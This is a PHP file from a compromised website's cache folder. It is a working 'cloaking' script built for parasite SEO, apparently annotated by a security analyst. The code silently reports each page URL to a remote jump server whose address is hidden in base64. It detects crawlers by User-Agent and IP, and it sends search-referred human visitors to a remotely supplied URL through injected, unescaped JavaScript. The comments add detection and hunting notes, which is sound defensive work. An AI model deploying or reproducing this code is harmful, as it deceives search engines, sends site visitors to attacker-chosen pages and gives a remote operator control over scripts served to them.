File: /home/sioberen/public_html/cache/cloaking.php
<?php
/**
* ===================================================================
* INTEGRATED CLOAKING SYSTEM
* ===================================================================
* Modified cloaking system for parasite website integration
* Removes unnecessary 404 handling and client-side scripts
* ===================================================================
*/
// Load configuration
require_once __DIR__ . '/config.php';
// Remove the original referer check - let original system handle if needed
// if (empty($_SERVER['HTTP_REFERER'])) {
// exit;
// }
/**
* Class Cloaker
* Provides server side checks to see if the visitor is a crawler.
*
* Analyst summary, based only on the code in this class:
* - The constructor calls fetchDynamicRedirectUrl(), so every instantiation
*   makes an outbound HTTP request that reports the current page URL to a
*   remote "jump" endpoint and stores the URL that endpoint returns.
* - check() classifies the visitor by User-Agent and, only when an IPStack
*   token is configured, by IP geolocation and IP range.
* - Both remote endpoints are stored as base64 literals; the decoded values are
*   noted at the call sites. The two base64 strings and the decoded jump host
*   are stable strings to search for when hunting for copies of this file, and
*   the jump host is a candidate for egress filtering and proxy-log review.
* - USE_CURL and parseProductId() are referenced but not defined in this file;
*   presumably they come from the required config.php -- confirm against it.
*/
class Cloaker {
/**
* Your redirect url for humans
* This should point to a legitimate page or the original site
*
* Overwritten in the constructor with the result of fetchDynamicRedirectUrl();
* it stays an empty string when that lookup fails.
*
* @var string
*/
protected $REDIRECT_URL = '';
/**
* Decide if you want to fully bypass client side javascript checks and rely only on server-side checks.
* Set to true for parasite deployment to avoid unnecessary client-side detection
*
* Within this class the value is only exposed through shouldBypassClientSideChecks().
*
* @var bool
*/
protected $BYPASS_CLIENT_SIDE_CHECKS = true;
/**
* Your token to access the IPStack service
* Get a free API token from https://ipstack.com
*
* Empty in this sample, which makes checkIpAddress() return false immediately,
* so only the User-Agent check is active as configured here.
*
* @var string
*/
protected $IP_STACK_TOKEN = '';
/**
* A list country codes to block.
* Example 'PH' for Philippines, https://en.wikipedia.org/wiki/ISO_3166-1
*
* @var array
*/
protected $BLOCKED_COUNTRY_CODES = array();
/**
* A list of city names to block.
* Use any common city names with care.
*
* @var array
*/
protected $BLOCKED_CITY_NAMES = array();
/**
* A list of corporate IP ranges to block.
* Example Twitter https://ipinfo.io/AS35995
*
* @var array
*/
protected $BLOCKED_IP_RANGES = array();
/**
* A list of user-agents to block.
* A robust list is provided lower down, but add any additional user agent strings here.
*
* @var array
*/
protected $BLOCKED_USER_AGENTS = array();
/**
* If you decide to re-obfuscate the client-side javascript, paste the new code here.
* For parasite deployment, this is usually not needed
*
* Not read anywhere in the code shown in this class.
*
* @var string
*/
protected $OBSFUCATED_JAVASCRIPT = "";
/**
* Resolves the redirect target at construction time.
* Side effect: performs the outbound request made by fetchDynamicRedirectUrl().
*/
public function __construct() {
$this->REDIRECT_URL = $this->fetchDynamicRedirectUrl();
}
/**
* Fetches the dynamic redirect URL from the jump service.
*
* Builds the current page URL from request data, sends it URL-encoded to the
* remote endpoint, and returns the "final_url" field of the JSON reply when the
* reply has code === 0. Returns an empty string in every other case.
*
* @return string
*/
protected function fetchDynamicRedirectUrl() {
// Construct the current URL from server variables
// NOTE(analysis): HTTP_HOST and REQUEST_URI are taken from the incoming request, so the
// value reported to the remote endpoint is whatever the client sent.
$currentUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
// parseProductId() is not defined in this file -- presumably provided by config.php.
$realProductId = parseProductId($_SERVER['REQUEST_URI']);
if ($realProductId !== null) {
// More precise match: target the last numeric segment of the URL path
// (a trailing "/<digits>/") and replace it with the parsed product id.
$currentUrl = preg_replace('/\/(\d+)\/$/', '/' . $realProductId . '/', $currentUrl);
}
// The API endpoint for fetching the redirect URL
// NOTE(analysis): the base64 literal decodes to
// hxxps://server[.]defghijk[.]com/jump?url= (defanged here). The encoding hides the host
// from a plain-text search of the file, so hunt for the base64 string as well.
$apiUrl = base64_decode('aHR0cHM6Ly9zZXJ2ZXIuZGVmZ2hpamsuY29tL2p1bXA/dXJsPQ==') . urlencode($currentUrl);
try {
// USE_CURL is not defined in this file -- presumably a constant from config.php.
if (USE_CURL) {
// Use cURL to fetch the response from the API
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $apiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// NOTE(analysis): certificate and host-name verification are both switched off, so the
// reply is accepted from any TLS endpoint that answers for this URL.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// A 10 second timeout on a request made during page generation: an unreachable endpoint
// can show up as slow page loads on the affected site.
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
// Fixed browser-like User-Agent on the outbound request; usable as a proxy-log pivot.
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
curl_close($ch);
} else {
// Stream-wrapper fallback with the same timeout and User-Agent as the cURL path.
$context = stream_context_create(array(
'http' => array(
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
)
));
// The @ operator suppresses warnings, so a failed fetch leaves no PHP warning in the logs.
$response = @file_get_contents($apiUrl, false, $context);
}
if ($response) {
$data = json_decode($response);
// Check if the response is valid and contains the redirect URL
if (json_last_error() === JSON_ERROR_NONE && isset($data->code) && $data->code === 0 && !empty($data->data->final_url)) {
// Trim any whitespace and return the final URL
// NOTE(analysis): the value is returned exactly as the remote service supplied it;
// no scheme or host validation is applied here.
return trim($data->data->final_url);
}
}
} catch (Exception $e) {
// The calls above report failure through return values (false/null), so this handler is
// presumably rarely reached; when it is, the message is only stored in $this->errors.
$this->errors[] = $e->getMessage();
}
// Fallback: an empty string is returned. No hardcoded URL exists in this version, and the
// caller at the bottom of the file skips the redirect when the value is empty.
return '';
}
/*
* ==========================================================================
* ==== Don't modify below this point unless you know what you are doing ====
* ==========================================================================
*/
/**
* Attribute to flag for blocked results.
* Set to true by check() when either the User-Agent or the IP check matches.
*
* @var bool
*/
protected $blocked = false;
/**
* Attribute to flag for human visitors from search engines.
* Public; written by the top-level code after the class, not by any method here.
*
* @var bool
*/
public $is_human_from_search = false;
/**
* List of errors.
* Appended to by the catch blocks in fetchDynamicRedirectUrl() and getIpStack().
*
* @var array
*/
protected $errors = array();
/**
* Getter for blocked attribute.
*
* @return bool
*/
public function isBlocked() {
return !!$this->blocked;
}
/**
* Getter for client-side bypass.
*
* @return bool
*/
public function shouldBypassClientSideChecks() {
return !!$this->BYPASS_CLIENT_SIDE_CHECKS;
}
/**
* Getter for error bag.
*
* @return array
*/
public function getErrors() {
return $this->errors;
}
/**
* Getter for redirect URL.
*
* @return string The value obtained from the remote jump service at construction, or ''.
*/
public function getRedirectUrl() {
return $this->REDIRECT_URL;
}
/**
* Primary method for running all checks.
*
* Runs the User-Agent check first; the IP check runs only when the visitor has
* not already been flagged. The result is cached in $this->blocked.
*
* @return bool True when the visitor was classified as a crawler ("blocked").
*/
public function check() {
if (!$this->blocked && $this->checkUserAgent()) {
$this->blocked = true;
}
if (!$this->blocked && $this->checkIpAddress()) {
$this->blocked = true;
}
return $this->blocked;
}
/**
* Run check on user agent string.
*
* The string from getBlockedUserAgents() is wrapped in parentheses, which
* preg_match() accepts as the pattern delimiters. No modifiers follow, so the
* match is case-sensitive and unanchored (any listed token appearing anywhere
* in the header matches). A request without a User-Agent header is not flagged.
*
* @return bool
*/
public function checkUserAgent() {
$search = $this->getBlockedUserAgents();
return !!(isset($_SERVER['HTTP_USER_AGENT']) && preg_match($search, $_SERVER['HTTP_USER_AGENT']));
}
/**
* Fetch result from IPStack and check against block lists.
* Block lists checked: $BLOCKED_COUNTRY_CODES, $BLOCKED_CITY_NAMES, $BLOCKED_IP_RANGES.
* Will also check against IPStacks known pool of crawler IP addresses.
*
* Returns false without any network request when no IPStack token is set,
* which is the case for the defaults in this sample.
*
* @return bool
*/
public function checkIpAddress() {
// [FIX] Add a crucial check: Do not perform IP checks if the token is not set.
// This prevents false positives where the API returns a default error response.
if (empty($this->IP_STACK_TOKEN)) {
return false;
}
// Get the result from IPStack
$ip = $this->getIpAddress();
$ipstack = $this->getIpStack($ip);
// Check to see if we got a response
if ($ipstack && !(isset($ipstack->success) && $ipstack->success === false)) {
// The fields below are read without isset(); this assumes the reply always carries
// security->is_crawler, country_code and city -- not verifiable from this file.
if ($ipstack->security->is_crawler ||
in_array($ipstack->country_code, $this->BLOCKED_COUNTRY_CODES) ||
in_array($ipstack->city, $this->BLOCKED_CITY_NAMES) ||
$this->ipInRange($ip, $this->BLOCKED_IP_RANGES)) {
return true;
}
}
return false;
}
/**
* Gets merged list of blocked user agents.
*
* Returns the configured $BLOCKED_USER_AGENTS (passed through preg_quote after
* joining) followed by the built-in alternation below, wrapped in "(" and ")".
* The built-in list is inserted as-is, so characters such as "." in its entries
* keep their regular-expression meaning.
*
* @return string
*/
public function getBlockedUserAgents() {
$search = '';
if (count($this->BLOCKED_USER_AGENTS)) {
$search = implode('|', $this->BLOCKED_USER_AGENTS);
$search = preg_quote($search) . '|';
}
// Built-in token list: search-engine crawlers, SEO and archive bots, and generic HTTP
// client names (java, wget, curl, Python-urllib, libwww), plus the bare token "bot".
$search = $search . 'googlebot|bot|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|Google-InspectionTool|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis';
$search = '(' . $search . ')';
return $search;
}
/**
* Gets the visitor's IP address to be checked against IPStack.
*
* Prefers the Client-IP and X-Forwarded-For request headers over REMOTE_ADDR.
* Both headers are supplied by the client (or an intermediary), and the value
* is returned unvalidated; getIpStack() places it directly into a request URL.
*
* @return string
*/
protected function getIpAddress() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
/**
* Fetches a response from the IPStack service.
* Must have a valid $IP_STACK_TOKEN and $ip address provided.
*
* @param $ip Address string as returned by getIpAddress(); inserted into the URL as-is.
*
* @return mixed|null Decoded JSON object, or null when the token/ip is empty, the
*                    reply does not decode, or the reply has success === false.
*/
protected function getIpStack($ip) {
if (!empty($this->IP_STACK_TOKEN) && !empty($ip)) {
try {
// The base64 literal decodes to http://api.ipstack.com/%s?access_key=%s -- a plain-HTTP
// URL, so the visitor address and the access key would travel unencrypted.
$url = sprintf(base64_decode('aHR0cDovL2FwaS5pcHN0YWNrLmNvbS8lcz9hY2Nlc3Nfa2V5PSVz'), $ip, $this->IP_STACK_TOKEN);
// USE_CURL is not defined in this file -- presumably a constant from config.php.
if (USE_CURL) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS verification is disabled here as in fetchDynamicRedirectUrl().
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
curl_close($ch);
} else {
$context = stream_context_create(array(
'http' => array(
'timeout' => 10,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
)
));
// Warnings suppressed with @; a failed fetch yields false.
$response = @file_get_contents($url, false, $context);
}
$response = json_decode($response);
// Keep the reply only when it decoded and is not an explicit success === false error.
if ($response && !(isset($response->success) && $response->success === false)) {
$ipstack = $response;
}
}
catch (Exception $e) {
$this->errors[] = $e->getMessage();
}
}
return isset($ipstack) ? $ipstack : null;
}
/**
* Checks the provided IP address against a corporate IP range.
*
* IPv4 only: both the address and each range are converted with ip2long().
* Entries without a "/" are treated as single hosts (/32).
*
* @param $ip     Address string to test.
* @param $ranges List of "a.b.c.d" or "a.b.c.d/nn" strings.
*
* @return bool True on the first range whose masked network equals the masked address.
*/
protected function ipInRange($ip, $ranges) {
foreach ($ranges as $range) {
// Loose comparison: true both when "/" is absent and when it is at offset 0.
if (strpos($range, '/') == false) {
$range .= '/32';
}
// $range is in IP/CIDR format eg 127.0.0.1/24
list($range, $netmask) = explode('/', $range, 2);
$ip_decimal = ip2long($ip);
$range_decimal = ip2long($range);
// Host-bit mask for the prefix length, inverted to obtain the network mask.
$wildcard_decimal = pow(2, (32 - $netmask)) - 1;
$netmask_decimal = ~$wildcard_decimal;
if (($ip_decimal & $netmask_decimal) == ($range_decimal & $netmask_decimal)) {
return true;
}
}
return false;
}
}
// Create new check instance
// NOTE(analysis): the constructor performs the outbound lookup to the remote jump service,
// so this line causes a network request each time this file is included.
$cloaker = new Cloaker();
// Run the initial checks (UA and IP)
$blocked = $cloaker->check();
// Visitors not classified as crawlers are redirected only when the Referer header contains
// one of the search-engine names below (case-insensitive substring match on the whole
// header). Direct visits and flagged crawlers fall through to the including script.
if (!$blocked) {
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (preg_match('/google|bing|yahoo|baidu|duckduckgo|yandex|aol|ask/i', $referer)) {
$redirectUrl = $cloaker->getRedirectUrl();
if (!empty($redirectUrl)) {
$cloaker->is_human_from_search = true;
// NOTE(analysis): the remotely supplied URL is concatenated into an inline script without
// escaping, so the remote operator controls script content served to this site's visitors.
// A response body consisting only of this window.location.href script for search-referred
// requests is a usable detection signature.
echo '<script>window.location.href="' . $redirectUrl . '";</script>';
exit;
}
}
}
// For parasite deployment, we don't need the original redirect logic.
// The final $blocked variable and the $cloaker object are the only things our index.php needs.
// NOTE(analysis): how index.php uses $blocked is not visible in this file; review that script
// to see what content flagged crawlers receive.